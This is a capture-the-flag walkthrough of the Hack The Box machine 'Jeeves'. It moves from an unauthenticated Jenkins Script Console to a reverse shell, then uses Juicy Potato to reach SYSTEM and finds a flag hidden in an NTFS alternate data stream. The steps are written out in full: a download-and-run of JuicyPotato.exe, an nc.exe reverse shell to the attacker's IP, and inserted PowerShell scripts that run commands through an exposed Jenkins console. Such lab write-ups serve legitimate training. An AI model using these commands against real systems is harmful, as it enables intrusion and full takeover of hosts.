Hack the Box — Jeeves(10)

CurlS
Jul 5, 2020 (8 min read)


HTB is a platform that provides a large number of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally capture two flags, a user flag and a root flag. As I am planning to take the OSCP exam, my focus is on exploiting HTB machines as preparation.

As I tend to remember things more easily when I write them down, I decided to summarize the walkthroughs as documentation for later reference, and for anyone who is interested in this topic.

This is my tenth HTB writeup!

Summary

This box was a good learning experience. I gained insight into some new and interesting techniques, such as using the Juicy Potato exploit to elevate the user's privileges, and into alternate data streams.

What led to the first foothold was a misconfigured Jenkins server. It did not enforce user authentication, thus allowing unauthenticated users to access powerful features such as the Script Console, where an attacker can execute arbitrary code on the server.

To elevate privileges to NT AUTHORITY\SYSTEM, the Rotten/Juicy Potato exploit can be used.

MITRE ATT&CK

T1005 Data from Local System
T1046 Network Service Scanning
T1134 Access Token Manipulation
T1068 Exploitation for Privilege Escalation

1. Enumeration

Nmap Scan

In order to identify vulnerabilities and proceed with exploitation, it is necessary to do a bit of port scanning and to collect as much information as possible about the target. I start with an Nmap scan to get an overview of open ports and running services.

nmap -A -p- -T4 10.10.10.63 -oX scanx.xml --webxml

-A: Enable OS detection, version detection, script scanning, and traceroute
-p-: All Ports
-T4: Faster execution (default is T3)
-oX: Save output as XML (--webxml adds a stylesheet reference so the XML renders in a browser)

Scan Result

Nmap Output

Open Ports: Analysis & Further Enumeration

Port 135: Remote Procedure Call

This is the Windows RPC endpoint mapper port. Nothing of interest here.

Port 445: SMB

I checked for null sessions and other enumeration options, but was not successful. SMB does not seem to be reachable through null sessions.

smbclient -N -L //10.10.10.63
smbmap -H 10.10.10.63

Port 80: Microsoft-IIS 10.0 / Ask Jeeves Web App

Nothing interesting is to be found on this page. Every search leads to the error.html page.

Extract HTML Source Code

The error.html page consists of a single image file showing some Microsoft SQL Server error text. The error message is: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 — 9.00.4053.00 .... to data type int.

Error Page with one image file as content

It is also worth checking whether fuzzing the web server reveals hidden directories:

gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
---> Nothing Found.

On port 80 there seems to be no real attack vector.

Port 50000: Jetty Server (9.4.z-SNAPSHOT) / Jenkins

A Jetty HTTP server is hosted on this port, and the banner reveals the snapshot version. A quick searchsploit search did not show any exploit for this version.

Landing Page on Port 50000

Again it is worth checking whether fuzzing reveals any hidden directories.

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.63:50000
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/04 14:12:38 Starting gobuster
===============================================================
/askjeeves (Status: 302)

There is an /askjeeves directory with a Jenkins web interface at http://10.10.10.63:50000/askjeeves. The Jenkins version is 2.87 (see the bottom right corner).

searchsploit does not show any available exploit for this Jenkins version. A Google search for “Exploiting Jenkins” led me to this page.

Script Console

Wow! The Script Console is available to unauthenticated users. An attacker can use this feature to execute arbitrary Groovy scripts directly on the server! The Script Console can be reached by navigating to Manage Jenkins / Script Console or by simply visiting http://10.10.10.63:50000/askjeeves/script.

I used the code sample from here to quickly test the feature, and indeed the whoami command revealed the user name: kohsuke.

Console Output for Command “whoami”

Running whoami /priv reveals the following privileges for the user kohsuke. Very interesting: whenever SeImpersonatePrivilege is enabled, one should definitely check the OS version, because in CTF-like boxes this privilege is often the ticket to elevating privileges with the Rotten/Juicy Potato exploit.
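The manual check above can be scripted. The following PowerShell is an added example, not code from the original write-up or from the Jenkins project: it probes the Script Console URL, decides whether it answers without a login, and if so runs a command through the text variant of the console. The base URL and port are taken from this box and the Groovy payload is the generic "execute a process and print its output" idiom, not the sample the author linked; the same script, run after hardening, is a quick way to confirm that the console now requires authentication.

```powershell
# Added example, not part of the original write-up: probe a Jenkins instance for a
# Script Console that answers without login and, if it does, run a command through it.
# The URL and path below are assumptions taken from this box; the Groovy payload is the
# usual "execute a process and print its output" idiom, not the author's sample.
param(
    [string]$BaseUrl = 'http://10.10.10.63:50000/askjeeves',
    [string]$Command = 'whoami /priv'
)

function Test-JenkinsScriptConsoleExposed {
    param([string]$BaseUrl, [Microsoft.PowerShell.Commands.WebRequestSession]$Session)
    try {
        $r = Invoke-WebRequest -Uri "$BaseUrl/script" -UseBasicParsing -WebSession $Session -ErrorAction Stop
    } catch {
        # A protected console answers 403 (Access Denied) to anonymous users, which
        # Invoke-WebRequest turns into an exception; an unreachable host lands here too.
        return $false
    }
    # Jenkins may instead redirect to /login; Invoke-WebRequest follows that redirect, so a
    # page carrying the login form (j_username) still counts as protected. The real console
    # page contains the Groovy textarea named "script".
    return ($r.StatusCode -eq 200 -and $r.Content -match 'name="script"' -and $r.Content -notmatch 'j_username')
}

function Invoke-JenkinsGroovy {
    param([string]$BaseUrl, [string]$Script, [Microsoft.PowerShell.Commands.WebRequestSession]$Session)
    $headers = @{}
    # With CSRF protection on, Jenkins rejects the POST unless it carries the crumb bound
    # to this session; with it off, /crumbIssuer returns 404 and we simply post without one.
    try {
        $crumb = Invoke-RestMethod -Uri "$BaseUrl/crumbIssuer/api/json" -UseBasicParsing -WebSession $Session -ErrorAction Stop
        $headers[$crumb.crumbRequestField] = $crumb.crumb
    } catch { }
    # /scriptText is the same console without the HTML: it returns the script's output as plain text.
    return Invoke-RestMethod -Uri "$BaseUrl/scriptText" -Method Post -Headers $headers `
        -Body @{ script = $Script } -WebSession $Session -UseBasicParsing
}

# Groovy that Jenkins compiles and runs server-side. $Command is expanded by PowerShell
# before sending, so the single quotes around it end up in the Groovy source.
$groovy = @"
def proc = '$Command'.execute()
def out = new StringBuffer(); def err = new StringBuffer()
proc.consumeProcessOutput(out, err)
proc.waitFor()
println out.toString() + err.toString()
"@

$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
if (Test-JenkinsScriptConsoleExposed -BaseUrl $BaseUrl -Session $session) {
    Write-Warning "$BaseUrl/script is reachable without authentication"
    Invoke-JenkinsGroovy -BaseUrl $BaseUrl -Script $groovy -Session $session
} else {
    "Script Console at $BaseUrl/script requires authentication (or the host is unreachable)"
}
```

Note that the crumb is tied to the HTTP session, which is why one WebRequestSession is threaded through both calls; fetching the crumb in a separate session would get a 403 on the POST even on a wide-open instance.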

2. First Foothold

It’s time to get a reverse shell to the box with the help of the exposed Script Console. All that is needed is a Groovy reverse shell script, which can be found with a quick Google search (check this GitHub repo).

Groovy Reverse Shell Command within Script Console

# nc -nlvp 4455
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
Ncat: Connection from 10.10.10.63.
Ncat: Connection from 10.10.10.63:49679.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins\users>whoami
whoami
jeeves\kohsuke

We have a reverse shell and can access the user flag.

c:\Users\kohsuke\Desktop> type c:\Users\kohsuke\Desktop\user.txt
type c:\Users\kohsuke\Desktop\user.txt
e3232....7066a

3. Elevation of Privilege

Rotten/Juicy Potato

What is known about the user kohsuke is that the user holds SeImpersonatePrivilege, which allows an attacker to impersonate tokens and elevate privileges to NT AUTHORITY\SYSTEM using tools such as Rotten Potato and Juicy Potato.

A detailed description can be found here.

For the Juicy Potato exploit to work we need a Windows version below 1809. Juicy Potato does not work on Windows Server 2019 and on Windows 10 version 1809 (build 17763) and higher, as explained in this blog post.

We are lucky though: build 10586 (Windows 10 version 1511) is vulnerable to the Rotten/Juicy Potato exploit.
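Both preconditions, an enabled impersonation privilege and a build before 17763, can be checked in one go before transferring any binaries. The PowerShell below is an added example, not part of the original write-up: it parses whoami /priv output for the two privileges the Potato family abuses and compares the build number against the 1809 cut-off. The whoami output embedded in it is constructed for illustration, and the build number is hard-coded to the value from the reverse shell banner above so the script runs offline; the commented alternatives show what to call on a live host.

```powershell
# Added example, not from the original write-up: check the two preconditions the text
# names before reaching for Rotten/Juicy Potato, an enabled impersonation privilege in
# "whoami /priv" and an OS build before Windows 10 1809 / Server 2019 (build 17763).
# The sample whoami output below is constructed for illustration.

function Get-ImpersonationPrivilege {
    param([string[]]$WhoamiPrivOutput)
    # whoami /priv prints one "Name  Description  State" row per privilege; keep the
    # two the Potato family can abuse, and only when their State column says Enabled.
    $rows = $WhoamiPrivOutput | Where-Object {
        $_ -match '^(SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)\s.*\sEnabled\s*$'
    }
    return @($rows | ForEach-Object { ($_ -split '\s+')[0] })
}

function Test-JuicyPotatoBuild {
    param([int]$Build)
    # Build 17763 (Windows 10 1809 / Server 2019) is where the DCOM trick Juicy Potato
    # relies on stopped handing out a SYSTEM token; older builds such as 10586 qualify.
    return ($Build -lt 17763)
}

function Get-LocalBuildNumber {
    # Read the build from the registry rather than [Environment]::OSVersion, which can
    # report an older version for processes without a compatibility manifest.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    return [int](Get-ItemProperty -Path $key -Name CurrentBuildNumber).CurrentBuildNumber
}

# Constructed sample of what "whoami /priv" prints for an account like kohsuke.
$sample = @(
    'PRIVILEGES INFORMATION',
    '----------------------',
    '',
    'Privilege Name                Description                               State   ',
    '============================= ========================================= ========',
    'SeShutdownPrivilege           Shut down the system                      Disabled',
    'SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled ',
    'SeImpersonatePrivilege        Impersonate a client after authentication Enabled ',
    'SeCreateGlobalPrivilege       Create global objects                     Enabled '
)

$privs = Get-ImpersonationPrivilege -WhoamiPrivOutput $sample   # live host: -WhoamiPrivOutput (whoami /priv)
$build = 10586                                                   # live host: Get-LocalBuildNumber

if ($privs.Count -gt 0 -and (Test-JuicyPotatoBuild -Build $build)) {
    "Build $build with $($privs -join ', ') enabled: Juicy Potato is worth trying"
} elseif ($privs.Count -gt 0) {
    "Build $build with $($privs -join ', ') enabled, but Juicy Potato does not work on 1809 and later"
} else {
    "No impersonation privilege enabled: the Potato family does not apply to this token"
}
```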

For the exploit this binary can be used. Once downloaded to the local machine, we can transfer the binary to the target system with, for example, the PowerShell System.Net.WebClient class.

First, start an HTTP server on the attacking machine in the directory where the file is located, using python3 -m http.server. Note that the default port is 8000 if none is given.

c:\Users\kohsuke\Desktop>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:8000/JuicyPotato.exe','C:/Users/kohsuke/Desktop/JuicyPotato.exe')"

c:\Users\kohsuke\Desktop>dir
 Directory of c:\Users\kohsuke\Desktop

07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 09:53 PM 347,648 JuicyPotato.exe
11/03/2017 11:22 PM 32 user.txt
2 File(s) 347,680 bytes
2 Dir(s) 7,234,682,880 bytes free

As netcat will also be needed for the exploit, transfer the netcat binary the same way as in the example above.

I followed the example explained on this page. First, I created a bat file that executes nc.exe 10.10.14.41 4455 -e cmd.exe in order to get a reverse shell.

c:\Users\kohsuke\Desktop>echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat
echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat

Now we can run the Juicy Potato binary, which will execute reverse.bat. A CLSID appropriate for the OS has to be used; you might have to try several service CLSIDs before the attack works:

c:\Users\kohsuke\Desktop>juicypotato.exe -l 6666 -p c:\Users\kohsuke\Desktop\reverse.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
juicypotato.exe -l 6666 -p c:\Users\kohsuke\Desktop\reverse.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 6666
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

-l: COM server listen port
-p: Program to launch
-t: CreateProcess call to use (t = CreateProcessWithTokenW, u = CreateProcessAsUser, * = try both)
-c: CLSID of the COM server to abuse

We get a shell back on our machine as NT AUTHORITY\SYSTEM.

Unfortunately, there is no root flag when navigating to the Administrator's Desktop folder. Instead there is a message that the flag is elsewhere and one has to look deeper.

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,234,617,344 bytes free

c:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere. Look deeper.

First I tried to find other suspicious files that could contain an admin password. I found one interesting candidate, but it was not the solution.

C:\Users\Administrator>where /r c: *password*
C:\Users\Administrator\.jenkins\secrets\initialAdminPassword

C:\Users\Administrator>type C:\Users\Administrator\.jenkins\secrets\initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491

--> not working!

It turned out that it was not that complicated…

Alternate Data Streams

All that was needed was the dir /r command to see the hidden stream.

Alternate Data Streams can be used to find hidden information or, from the other perspective, to hide secret information. An ADS is an NTFS feature (an additional named $DATA attribute attached to a file) and is not visible to most Windows applications, nor to a plain dir or type. Any sort of file can be stored in an ADS (text, image, audio, ...).

To hide data in a stream, the following command can be used:

echo secret > hm.txt:root.txt

The input is written into a named $DATA attribute of hm.txt; the visible content of hm.txt and the size that dir reports for it do not change.

type cannot open a stream path directly, but more with input redirection can read it. Writing its output into a new file gives us a regular file containing the secret data (more < hm.txt:root.txt on its own would also print it):

c:\Users\Administrator\Desktop>more <hm.txt:root.txt> newroot.txt
more <hm.txt:root.txt> newroot.txt
c:\Users\Administrator\Desktop>type newroot.txt
type newroot.txt
afbc5....92530
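PowerShell has native support for streams, which makes both hiding and hunting for them less clumsy than the cmd.exe redirection trick. The script below is an added example and not part of the original write-up: it creates a file with a hidden stream, lists and reads that stream, and then walks a directory tree reporting every named stream, which is what "look deeper" amounts to when you do not already know which file carries the flag. The directory, file and stream names and the flag value are constructed for the demo.

```powershell
# Added example, not part of the original write-up: create, enumerate, read and remove an
# NTFS alternate data stream with PowerShell, plus a hunt for hidden streams across a tree.
# The directory, file and stream names are assumptions; the flag value is constructed.
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'hm.txt'

# The visible text lives in the unnamed stream (reported as ':$DATA') ...
Set-Content -Path $file -Value 'The flag is elsewhere. Look deeper.'
# ... and the secret goes into a named stream: dir, type and the file size never reveal it
# (this is what "echo secret > hm.txt:root.txt" does from cmd.exe).
Set-Content -Path $file -Stream 'root.txt' -Value 'constructed-flag-value-not-the-real-one'

# List every stream on the file (the PowerShell equivalent of "dir /r").
Get-Item -Path $file -Stream * | Select-Object FileName, Stream, Length

# Read the hidden stream directly, no "more < hm.txt:root.txt > newroot.txt" detour needed.
Get-Content -Path $file -Stream 'root.txt'

function Find-AlternateDataStream {
    # Walk a tree and report every named stream except Zone.Identifier, which Windows
    # attaches to downloaded files and is noise when looking for hidden data.
    param([string]$Root)
    Get-ChildItem -Path $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}
# On the box this would be run against C:\Users; here it only finds the demo stream.
Find-AlternateDataStream -Root $dir

# Deleting the stream leaves hm.txt and its visible content untouched.
Remove-Item -Path $file -Stream 'root.txt'
Get-Item -Path $file -Stream * | Select-Object Stream, Length
```

Streams only exist on NTFS; copying hm.txt to a FAT volume or uploading it through most tools silently drops root.txt, which is also why the Zone.Identifier mark-of-the-web disappears when a file is moved that way.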

Mitigation

  • Jenkins should be securely configured. An unauthenticated user should not be able to use the power of the Jenkins Script Console, even if the instance is used on the intranet only. This vulnerability gave us a low-privileged shell. Only Jenkins admins (the Overall/Administer permission) should have this access. See also here.
  • On port 80 we found an image file with SQL Server error messages. Such information should not be leaked.
